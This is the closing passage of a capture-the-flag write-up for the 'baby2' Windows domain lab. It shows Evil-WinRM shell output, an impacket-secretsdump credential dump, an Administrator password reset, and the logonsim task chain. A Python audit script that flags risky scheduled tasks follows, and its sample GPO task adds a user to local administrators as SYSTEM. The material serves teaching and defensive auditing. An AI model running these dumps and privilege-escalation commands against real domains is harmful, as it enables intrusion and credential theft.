Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\gpoadm\Documents> whoami
baby2\gpoadm
*Evil-WinRM* PS C:\Users\gpoadm\Documents>

Beyond root

┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ xfreerdp /v:10.10.74.17 -sec-nla

┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ impacket-secretsdump baby2.vl/gpoadm:'Password123!'@10.10.74.17

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x34170b414576a40142e3edc4911d859d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::

*Evil-WinRM* PS C:\Users\Administrator\Documents> net user administrator Password123!
The command completed successfully.

┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ xfreerdp /v:10.10.74.17 -sec-nla 

c:\windows\system32\tasks\logonsim

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2023-08-22T12:48:15.1312495</Date>
    <Author>BABY2\Administrator</Author>
    <URI>\logonsim</URI>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Repetition>
        <Interval>PT1M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <Enabled>true</Enabled>
      <UserId>BABY2\Amelia.Griffiths</UserId>
      <Delay>PT2M</Delay>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <RunLevel>LeastPrivilege</RunLevel>
      <UserId>BABY2\Amelia.Griffiths</UserId>
      <LogonType>InteractiveToken</LogonType>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
      <Arguments>\windows\logon.ps1</Arguments>
    </Exec>
  </Actions>
</Task>

c:\windows\login.ps1

cscript //X \\baby2.vl\SYSVOL\baby2.vl\scripts\login.vbs
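The task XML and login.ps1 above explain the whole chain: a logon task runs as Amelia.Griffiths every minute, it calls a local script, and that script runs login.vbs straight out of SYSVOL, where a low-privileged user could overwrite it. The pyGPOAbuse step earlier relies on the other task-based pattern, an ImmediateTaskV2 running as SYSTEM dropped into the Default Domain Policy's ScheduledTasks.xml. The following is an added example, not part of the write-up or of any tool it uses: a small Python audit that parses both stand-alone Task Scheduler XML (C:\Windows\System32\Tasks) and Group Policy Preference ScheduledTasks.xml and flags tasks that run script files, reference UNC paths, or are immediate GPO tasks running as SYSTEM. The two XML samples are constructed to mirror what this box showed; the GPP sample assumes the usual ImmediateTaskV2/Properties/Task layout with the clsid attributes left out, which the parser ignores anyway.

```python
"""Audit Task Scheduler XML (C:\\Windows\\System32\\Tasks\\*) and Group Policy Preference
ScheduledTasks.xml for the task patterns this box relied on. Added example; the sample
XML below is constructed to mirror the write-up, not copied from the box."""
import re
import xml.etree.ElementTree as ET

SCRIPT_EXT = re.compile(r"\.(ps1|vbs|bat|cmd|js)\b", re.IGNORECASE)


def _local(tag):
    """'{http://...}Exec' -> 'Exec', so namespaced and bare Task XML parse alike."""
    return tag.rsplit("}", 1)[-1]


def _find(el, name):
    """First descendant (or el itself) whose local tag name is `name`, else None."""
    return next((c for c in el.iter() if _local(c.tag) == name), None)


def _text(el, name):
    node = _find(el, name) if el is not None else None
    return (node.text or "").strip() if node is not None else ""


def _is_system(user):
    u = user.upper()
    return u == "S-1-5-18" or u.endswith("SYSTEM")


def _audit_one(task, name, run_as, immediate):
    principal = _find(task, "Principal")
    user = _text(principal, "UserId") or run_as  # GPP carries the account in runAs=
    triggers = _find(task, "Triggers")
    trigger_names = [_local(t.tag) for t in triggers] if triggers is not None else []
    args = _text(task, "Arguments")
    cmdline = f"{_text(task, 'Command')} {args}".strip()
    base = {"task": name, "runs_as": user, "run_level": _text(principal, "RunLevel"),
            "triggers": trigger_names, "command": cmdline}
    findings = []
    if immediate and _is_system(user):
        findings.append({**base, "risk": "immediate GPO task running as SYSTEM"})
    if "\\\\" in cmdline:  # a UNC path: the share's write ACL decides who controls the task
        findings.append({**base, "risk": "executes content from a UNC path; check the share's write ACL"})
    if SCRIPT_EXT.search(args):  # logonsim: powershell.exe \windows\logon.ps1 -> login.vbs on SYSVOL
        findings.append({**base, "risk": "runs a script file; check who can write it and every file it calls"})
    return findings


def audit_task_xml(xml_text):
    """Return findings for a stand-alone task file or a GPP ScheduledTasks.xml."""
    # Drop the <?xml ... encoding="UTF-16"?> declaration: the caller already decoded the text.
    root = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text))
    wrappers = [e for e in root.iter() if _local(e.tag) in ("ImmediateTaskV2", "TaskV2")]
    if not wrappers:  # a bare <Task> file from System32\Tasks
        return _audit_one(root, _text(root, "URI") or "?", "", immediate=False)
    findings = []
    for w in wrappers:
        task = _find(w, "Task")
        if task is None:
            continue
        props = _find(w, "Properties")
        run_as = props.get("runAs", "") if props is not None else ""
        findings += _audit_one(task, w.get("name", "?"), run_as,
                               immediate=_local(w.tag) == "ImmediateTaskV2")
    return findings


def audit_task_file(path):
    """Task files on disk are UTF-16 with a BOM; GPP XML under SYSVOL is usually UTF-8."""
    with open(path, "rb") as fh:
        raw = fh.read()
    text = raw.decode("utf-16") if raw[:2] in (b"\xff\xfe", b"\xfe\xff") else raw.decode("utf-8-sig")
    return audit_task_xml(text)


# Constructed sample 1: the logonsim task from the box, trimmed to the elements that matter.
LOGONSIM_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\logonsim</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled>
    <UserId>BABY2\Amelia.Griffiths</UserId></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel>
    <UserId>BABY2\Amelia.Griffiths</UserId></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
    <Arguments>\windows\logon.ps1</Arguments></Exec></Actions>
</Task>"""

# Constructed sample 2: the shape of the GPP entry an immediate task leaves in
# Policies\{GPO-ID}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml (clsid attributes omitted).
GPP_IMMEDIATE_TASK = r"""<ScheduledTasks>
  <ImmediateTaskV2 name="TASK_60bdad92">
    <Properties action="C" name="TASK_60bdad92" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Principals><Principal id="Author"><UserId>NT AUTHORITY\System</UserId>
          <RunLevel>HighestAvailable</RunLevel></Principal></Principals>
        <Actions Context="Author"><Exec><Command>cmd.exe</Command>
          <Arguments>/c net localgroup administrators /add gpoadm</Arguments></Exec></Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>"""

if __name__ == "__main__":
    for sample in (LOGONSIM_TASK, GPP_IMMEDIATE_TASK):
        for f in audit_task_xml(sample):
            print(f"[{f['task']}] as {f['runs_as'] or '?'} ({f['run_level'] or '?'}): {f['risk']}")
            print(f"    {f['command']}")
```

Run against the real files, `audit_task_file(r"C:\Windows\System32\Tasks\logonsim")` reports the script finding for Amelia's task, and pointing it at the Default Domain Policy's ScheduledTasks.xml on SYSVOL would have surfaced TASK_60bdad92 as a SYSTEM immediate task. The "runs a script file" finding is deliberately a prompt to follow the call chain by hand: here logon.ps1 itself is harmless, and the weakness is the write ACL on login.vbs one hop further down in SYSVOL.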
